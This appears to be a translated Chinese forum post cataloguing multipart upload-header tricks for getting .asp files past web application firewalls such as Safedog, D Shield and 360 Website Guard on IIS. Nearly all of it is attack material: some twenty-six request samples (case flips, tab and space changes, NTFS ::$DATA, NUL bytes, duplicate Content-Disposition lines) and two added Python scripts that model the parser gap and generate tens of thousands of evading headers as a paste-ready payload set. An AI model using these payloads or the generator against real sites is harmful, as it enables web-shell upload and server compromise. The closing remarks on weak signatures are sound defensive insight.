Default state
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]
Bypass 0: a tab in front of the filename ([0x09] stands for a literal tab byte)
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename="[0x09]a.asp"
Content-Type: text/html[/mw_shl_code]
Bypass 1: drop the double quotes
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename=a.asp
Content-Type: text/html[/mw_shl_code]
Bypass 2: add a filename1 parameter
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename="a.asp";filename1="test.jpg"
Content-Type: text/html[/mw_shl_code]
Bypass 3: a + in the middle of form-data
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: f+orm-data; name="filepath";filename="test.asp"
Content-Type: text/html[/mw_shl_code]
Bypass 4: mixed case in the header name
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]
Bypass 5: drop form-data
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]
Bypass 6: several spaces after Content-Disposition: or after form-data;
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition:    form-data;    name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]
Bypass 7: a.asp . (space + dot)
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name="filepath"; filename="a.asp ."
Content-Type: text/html[/mw_shl_code]
Bypass 8: a line break before the closing quote
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name="filepath"; filename="a.asp
"
Content-Type: text/html[/mw_shl_code]
Bypass 9: NTFS stream
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name="filepath"; filename="test.asp::$DATA"
Content-Type: text/html
------WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name="filepath"; filename="test.asp::$DATA\0x00\fuck.asp0x00.jpg"
Content-Type: text/html[/mw_shl_code]
Bypass 10: Testing against IIS 6.0 showed that it always takes the value from the first Content-Disposition as the received parameter, while Safedog (安全狗) always takes the value from the last Content-Disposition. So we try constructing the following request (test.asp uploaded successfully):
[mw_shl_code=bash,true]Content-Disposition: form-data; name="FileUploadName"; filename="test.asp"
-----------------------------15377259221471
Content-Disposition: form-data; name="FileUploadName"; filename="test.txt"
Content-Type: application/octet-stream
Content-Disposition: form-data; name="FileUploadName"; filename="test.asp"
Content-Disposition: form-data;
name="FileUploadName"; filename="test.asp"[/mw_shl_code]
Bypass 11: swap the header order
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Type: text/html
ConTent-Disposition: form-data; name="filepath"; filename="a.asp"[/mw_shl_code]
Some of the methods above get past Safedog (安全狗), and some also get past D盾 (D Shield), 360网站卫士 (360 Website Guard) and others. How would you categorize them? I group them into two kinds: features, and WAF parsing errors (PS: I am not an academic, so this is informal). Features include system features, protocol features and so on. Most of the cases above are protocol features, because the multipart/form-data format is extremely loose; some are system features, such as the trailing space, the trailing dot and the NTFS stream. Parsing errors are cases like bypass 2 (adding a filename1), which would never occur in a normal request, or bypass 0, where the WAF cannot handle a special character; at bottom both are the WAF mishandling the content it parses.
As for features, in the upload area the only ones we seem able to use are system features and protocol features. System features have been dug up only a little since these systems appeared, and for newbies like me they are even harder to find. So we turn our attention to the protocol.
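The parser differential behind bypasses 0 to 11, as an added worked example (not code from the original post): a hypothetical WAF signature that matches only the textbook Content-Disposition line and, as the post reports for Safedog, trusts the last such line in a part, is run against a hypothetical tolerant server parser that, as reported for IIS 6.0, trusts the first one and also accepts the case, whitespace, quoting and NTFS-stream variations. The parts are constructed from the post's own samples with a placeholder body; `waf_filename`, `server_filename`, `windows_name`, `differential`, `bypasses` and the extension list `ASP_EXT` are this example's own names, and neither side is the real code of any product. The point is to see where two readings of the same bytes diverge.

```python
import re

# Added example, not code from the original post: a model of the parser
# differential the post exploits. A WAF that pattern-matches the textbook
# Content-Disposition line is run against a tolerant server-side parser. Both
# sides are assumptions built from what the post reports, not the real code of
# Safedog, IIS 6.0 or any other product.

ASP_EXT = (".asp", ".asa", ".cer", ".cdx")   # extensions IIS 6 maps to asp.dll

# Hypothetical WAF signature: exact case, one space after each separator, quoted
# values without whitespace, nothing after the closing quote; with several such
# lines in one part the LAST one wins (what the post reports for Safedog).
WAF_RE = re.compile(
    r'^Content-Disposition: form-data; name="[^"]*"; filename="([^"\s]*)"$', re.M)

def waf_filename(part):
    found = WAF_RE.findall(part.split("\n\n", 1)[0])
    return found[-1] if found else None

# Hypothetical tolerant server: names are case-insensitive, any spaces/tabs are
# accepted around ':' '=' ';', values may be unquoted, a quoted value may span a
# line break, 'form-data' is optional, and the FIRST Content-Disposition that
# carries a filename wins (what the post reports for IIS 6.0).
CD_RE = re.compile(r'(?im)^[ \t]*content-disposition[ \t]*:')

def scan_params(s, pos):
    """key[=value] pairs separated by ';' from pos up to the first newline that
    is not inside a quoted string; returns [(key_lower, value), ...]."""
    params, n = [], len(s)
    while pos < n:
        while pos < n and s[pos] in " \t;":
            pos += 1
        if pos >= n or s[pos] == "\n":
            break
        start = pos
        while pos < n and s[pos] not in "=;\n":
            pos += 1
        key, value = s[start:pos].strip().lower(), ""
        if pos < n and s[pos] == "=":
            pos += 1
            while pos < n and s[pos] in " \t":
                pos += 1
            if pos < n and s[pos] == '"':
                start = pos = pos + 1
                while pos < n and s[pos] != '"':       # a newline does not end it
                    pos += 1
                value, pos = s[start:pos], pos + 1
            else:
                start = pos
                while pos < n and s[pos] not in ";\n":
                    pos += 1
                value = s[start:pos].strip()
        params.append((key, value))
    return params

def windows_name(name):
    """Assumed on-disk name: C-string APIs stop at NUL, '::$DATA' is the default
    NTFS stream of the same file, Win32 drops trailing spaces and dots, and the
    parser trims surrounding whitespace."""
    name = name.split("\x00", 1)[0].split("::$DATA", 1)[0]
    return name.strip().rstrip(" .")

def server_filename(part):
    headers = part.split("\n\n", 1)[0]
    for m in CD_RE.finditer(headers):
        for key, value in scan_params(headers, m.end()):
            if key == "filename":
                return windows_name(value)
    return None

def differential(part):
    waf, srv = waf_filename(part), server_filename(part)
    return {"waf_sees": waf,
            "waf_blocks": waf is not None and waf.lower().endswith(ASP_EXT),
            "server_saves": srv,
            "server_runs": srv is not None and srv.lower().endswith(ASP_EXT)}

# Constructed parts reproducing bypasses 0-11 from the post (body is a placeholder).
B = "------WebKitFormBoundary2smpsxFB3D0KbA7D\n"
CT = "\nContent-Type: text/html\n\nplaceholder body\n"
CASES = {
    "default":        B + 'Content-Disposition: form-data; name="filepath"; filename="a.asp"' + CT,
    "0 tab":          B + 'Content-Disposition: form-data; name="filepath"; filename="\ta.asp"' + CT,
    "1 unquoted":     B + 'Content-Disposition: form-data; name="filepath"; filename=a.asp' + CT,
    "2 filename1":    B + 'Content-Disposition: form-data; name="filepath"; filename="a.asp";filename1="test.jpg"' + CT,
    "3 f+orm-data":   B + 'Content-Disposition: f+orm-data; name="filepath";filename="test.asp"' + CT,
    "4 case":         B + 'ConTent-Disposition: form-data; name="filepath"; filename="a.asp"' + CT,
    "5 no form-data": B + 'Content-Disposition: name="filepath"; filename="a.asp"' + CT,
    "6 spaces":       B + 'Content-Disposition:    form-data;    name="filepath"; filename="a.asp"' + CT,
    "7 space dot":    B + 'Content-Disposition: form-data; name="filepath"; filename="a.asp ."' + CT,
    "8 newline":      B + 'Content-Disposition: form-data; name="filepath"; filename="a.asp\n"' + CT,
    "9 ntfs":         B + 'Content-Disposition: form-data; name="filepath"; filename="test.asp::$DATA"' + CT,
    "10 first/last":  B + 'Content-Disposition: form-data; name="FileUploadName"; filename="test.asp"\n'
                        + 'Content-Disposition: form-data; name="FileUploadName"; filename="test.txt"\nContent-Type: application/octet-stream\n\nplaceholder body\n',
    # the post's sample for 11 also capitalises ConTent; this model is not order-sensitive
    "11 order":       B + 'Content-Type: text/html\nConTent-Disposition: form-data; name="filepath"; filename="a.asp"\n\nplaceholder body\n',
}

def bypasses():
    """Cases the WAF model lets through while the server model stores an asp.dll file."""
    return [name for name, part in CASES.items()
            if (d := differential(part))["server_runs"] and not d["waf_blocks"]]
```

`bypasses()` returns every case except `default`: each of the eleven variants ends up stored as an `.asp` file by the server model, while the WAF model either cannot extract a filename at all or extracts one (`test.asp::$DATA`, `test.txt`) whose extension looks harmless. `differential()` on a single case shows both readings side by side, which is the quickest way to see why a signature that only recognises the textbook header is not a control.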
Default state
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]
We have already started testing the methods above. Now think about this: since you thought of using the Windows feature of appending a space, have you thought of using the protocol itself to add or remove spaces?
Bypass method 001 (no space after Content-Disposition:)
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition:form-data; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]
Bypass method 002
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]
Bypass method 003 (no space after Content-Type:)
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename="a.asp"
Content-Type:text/html[/mw_shl_code]
Bypass method 004 (a space after filename=)
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename= "a.asp"
Content-Type:text/html[/mw_shl_code]
Bypass method 005
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]
That makes five methods, each adding or removing a space at a different position in the two header lines. Next: if a space works, what can stand in for a space? A tab? Let's try.
Bypass method 006
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]
Bypass method 007
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="uploaded"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]
Bypass method 008
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename= "a.asp"
Content-Type: text/html[/mw_shl_code]
The methods above can be extended in many more ways; remember one thing: what can replace a space!
Next, following the method published earlier: case variation.
Bypass method 009 (lower-case disposition)
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-disposition: form-data; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]
Bypass method 010 (capital F in Form-data)
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: Form-data; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]
Bypass method 011 (capital N in Name)
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; Name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]
Bypass method 012 (capital F in Filename)
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; Filename="a.asp"
Content-Type: text/html[/mw_shl_code]
Bypass method 013 (lower-case type)
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename="a.asp"
Content-type: text/html[/mw_shl_code]
Now let's combine this with one of the earlier tricks: remember the + inside form-data? Why not put it in front of or after form-data instead?
Bypass method 014 (+ before form-data)
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: +form-data; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]
Bypass method 015 (+ after form-data)
[mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data+; name="filepath"; filename="a.asp"
Content-Type: text/html[/mw_shl_code]
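Methods 001 to 015 are hand-picked points in a much larger space. As an added example (not the post author's tooling), the script below enumerates that space: every slot where the post adds or removes a space, the tab substitute, each case flip (header name, form-data, name, filename) and the `+` before or after form-data, then counts how many of the generated lines fail a hypothetical textbook-exact signature while a hypothetical tolerant extractor still reads `a.asp` out of them. `STRICT`, `TOLERANT`, `variants`, `report` and `corpus` are this example's own names, and both regexes are models rather than any real WAF's or server's code; whether a given variant is actually accepted by the target server still has to be confirmed by sending it.

```python
import itertools
import re

# Added example, not from the original post. It generalises bypass methods
# 001-015 into the full mutation space of the Content-Disposition line and
# measures the gap between an exact-match signature and a tolerant extractor.
# Both regexes are hypothetical models, not any real WAF's or server's code.

GAPS = ["", " ", "  ", "\t"]                     # what can stand in for one space
HEADER = ["Content-Disposition", "Content-disposition", "ConTent-Disposition"]
FORMDATA = ["form-data", "Form-data", "+form-data", "form-data+"]
NAME = ["name", "Name"]
FILENAME = ["filename", "Filename"]

# Hypothetical strict signature: the exact textbook line from the "default state".
STRICT = re.compile(r'^Content-Disposition: form-data; name="[^"]*"; filename="([^"]*)"$')
# Hypothetical tolerant extractor: case-insensitive, whitespace-agnostic around
# ':' and '=', ignores the first ';'-delimited token, quotes optional.
TOLERANT = re.compile(
    r'(?i)^content-disposition[ \t]*:[ \t]*[^;\n]*;[^\n]*?filename[ \t]*=[ \t]*"?([^"\n;]*)')

def variants():
    """Yield every Content-Disposition line in the mutation space (49,152 lines)."""
    for hdr, fd, nm, fn, g in itertools.product(
            HEADER, FORMDATA, NAME, FILENAME, itertools.product(GAPS, repeat=5)):
        yield f'{hdr}:{g[0]}{fd};{g[1]}{nm}={g[2]}"filepath";{g[3]}{fn}={g[4]}"a.asp"'

def report():
    """Count how the two models disagree over the whole space."""
    total = evade = parsed = evade_and_parsed = 0
    for line in variants():
        total += 1
        strict_hit = STRICT.match(line) is not None
        tol = TOLERANT.match(line)
        ok = tol is not None and tol.group(1) == "a.asp"
        evade += not strict_hit
        parsed += ok
        evade_and_parsed += (not strict_hit) and ok
    return {"total": total, "evade_strict": evade,
            "tolerant_parses": parsed, "evade_and_parsed": evade_and_parsed}

def corpus(limit=10):
    """First `limit` variants that evade the strict signature, ready to paste
    into a repeater/intruder request body."""
    out = []
    for line in variants():
        if STRICT.match(line) is None:
            out.append(line)
            if len(out) == limit:
                break
    return out
```

`report()` returns 49,152 lines, of which all but the single textbook line evade the strict signature, and every one of them still yields `a.asp` to the tolerant extractor; `corpus(n)` hands back the first n evading lines as a payload set. The lesson is the one the post keeps repeating: a filter that recognises one spelling of the header is checking the attacker's formatting, not the upload.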